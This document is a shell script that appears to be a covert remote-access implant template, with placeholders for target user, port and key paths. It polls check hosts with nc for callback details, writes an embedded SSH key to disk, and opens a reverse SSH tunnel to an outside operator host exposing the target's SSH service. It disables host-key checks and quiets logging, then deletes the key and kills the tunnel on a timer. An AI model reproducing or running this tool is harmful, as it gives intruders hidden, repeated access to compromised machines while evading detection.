#!/bin/sh
REMUSR=user
TARUSR=<target_user>
TARSSH=<target_ssh_port>
CHK_IPs="<CHK_IP(s)>"
CHK_PORT=<CHK_PORT>
KEY="</path/to/key/on/target>"
SLEEP1=<time_in_seconds_that_REMLIS_will_be_available>
SLEEP2=<time_in_seconds_between_checks>

get_value () {
echo $INFO | cut -f $1 -d ":"
}

jumpto () {
	label=$1
	cmd=$(sed -n "/$label:/{:a;n;p;ba};" $0 | grep -v ':$')
	eval "$cmd"
	exit
}

while true
do
	for LIVEHOST in $CHK_IPs
	do
		INFO=$(nc -nw1 $LIVEHOST $CHK_PORT)
#		INFO=$(wget --timeout=1 --tries=1 -qO- -o /dev/null $LIVEHOST:$CHK_PORT)
		if [ $? -eq 0 ]; then
			CB_PORT=$(get_value 1)
			CB_IP=$(get_value 2)
			REMLIS=$(get_value 3)
			jumpto encoded
			resume:
			echo "$b64" | base64 -d > ${KEY}
			ssh -o LogLevel=quiet -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p ${CB_PORT} -R 127.0.0.1:${REMLIS}:127.0.0.1:${TARSSH} -i $KEY -N ${CB_IP} -l ${REMUSR} &
			SSH_PID=$(ss -tuanp | egrep "$CB_IP":"$CB_PORT" | egrep -o "pid=[0-9]+" | cut -d "=" -f 2)
#			SSH_PID=$(netstat -tuanp | egrep "$CB_IP":"$CB_PORT" | egrep -o "EST.*[0-9]+" | cut -d " " -f 2
			sleep $SLEEP1 && rm -rf ${KEY}; kill -9 $SSH_PID && wait $! 2>/dev/null
			continue
		else
			sleep $SLEEP2
		fi
	done
done

encoded:
b64=$(cat <<EOF
:r ! base64 /path/to/pub/key/on/opstation
EOF
)
jumpto resume
